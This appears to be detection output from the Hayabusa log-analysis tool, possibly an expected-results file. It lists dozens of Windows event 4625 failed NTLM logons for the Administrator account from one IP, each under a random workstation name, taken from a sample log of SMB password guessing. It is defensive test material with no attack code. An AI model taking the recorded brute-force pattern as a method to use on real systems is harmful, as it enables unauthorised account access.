+2016-09-20 01:51:28.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AXN94VanwME6q8rc  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.467 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JOj7CZ3stJXePY8b  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.513 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DXjmqxguFGL3f8cV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: qHWmdxnRrMbxrdlN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.681 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6ROBnjuyHn4FRugk  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.754 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: zGxuUxasL680O21l  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.812 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CYoM984EzAkUtBoa  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.857 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0e3ATNpzeeAf6Qax  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.889 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1A0dGhpVy8kgiRP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.935 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xGgNAKJM5RAt9B5K  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:28.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: c3DpedXujvQpZnjQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.019 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BsaSjESaUHbsIxJL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.062 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ca4dlxyEco3VOapw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.100 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 9Z6lJc7DXAOcNZ2G  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.144 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Olt5mS7na07VDJE  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.185 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oCFeQcUMDTs0ev8v  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: FYmH6CQrizoZ1DAx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.285 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iYtujXkzySwZQFk8  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KE9v6wzrebvjvDIl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.365 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 81gmRFFBHI1s4dqi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.409 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: C8gHWPDjQM8M3tiQ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.442 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: szj4mJvtFV06CuR2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.493 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ceGEl87hOM0InAAd  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.541 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XRv3C3rRxYXTgckj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.581 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TaPkJPIQnbL3VyUC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.618 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: LZ7PZAT6hWWHNc29  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.664 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: AJVD4uVhwfLSJ6Ab  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q6KME1I6tE0v9UAq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Qtt1rk4n3tOJko2  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: prPsA8EZHGfGPSHm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: TQqGXnwHtB87LSzT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.870 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6uLT1bjaIS0XBsWC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: PIgpraQTxFrcLphN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Q1D6qy57XImq4prx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:29.992 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Kw44Ffh4DIPlyuM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.037 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: oKUdmKU74RmJysAx  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.085 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gZUTzZw0T1tYRSP5  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.127 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: nEOfjuAMa7HTsfcP  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.243 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: e7bG19emMTmyBQNm  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.332 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: YsLkgWukfqS3wWJK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: liFcZjjpY3xXwe9j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.422 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vBUgbfzx2OEcOxWL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: iVCV0WoZmLTFNH71  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.516 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ZJmxGOqck4oQi1kL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: w7lYqaUvEtTp18DK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yZ9xQmGn61JJDeQS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.649 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XuMXpvY9fmLm0eBq  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ofesuNErTLWuN0k4  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KsNq7SThd3b8oTwF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MmRWg5gNRcxDMFjg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.841 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: JXrGn6LehVwTGNNj  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.880 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: vIq9DS71jCjWbgdY  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.937 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kw2BQbdUml0EPNOs  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:30.981 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: ugOqsKQFGmmLac3s  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.021 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3rZHUbOUVBYiHarB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: otv8ByrbWWoTz7pi  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HVlHkJu4Gxc9dhxM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: xKF5OCqLVVKvung0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.162 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: avAdpkOlP0xji1vG  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.214 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: VFgzMjEz6M0LBnX7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: kdJb0obVAqkY9GCw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.301 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6ciSoQcLUgLfzaNg  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.340 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: RECrGCCTJuDPlvYJ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1Z2w67uyC2NOgecT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lRVetRdHvz0lJkOC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yXrtxquzyzxKnQgD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.526 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: pWOoEIEem7Q9Mdx0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.565 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 86n5nIm04810NptD  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: M08noHtTqqx3pxSe  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.651 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 3P983pRVfCVlVTyA  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.699 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: eMKlcLvRhlx9FMcZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:51:31.733 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0gwEDgRF2wUgTDAy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
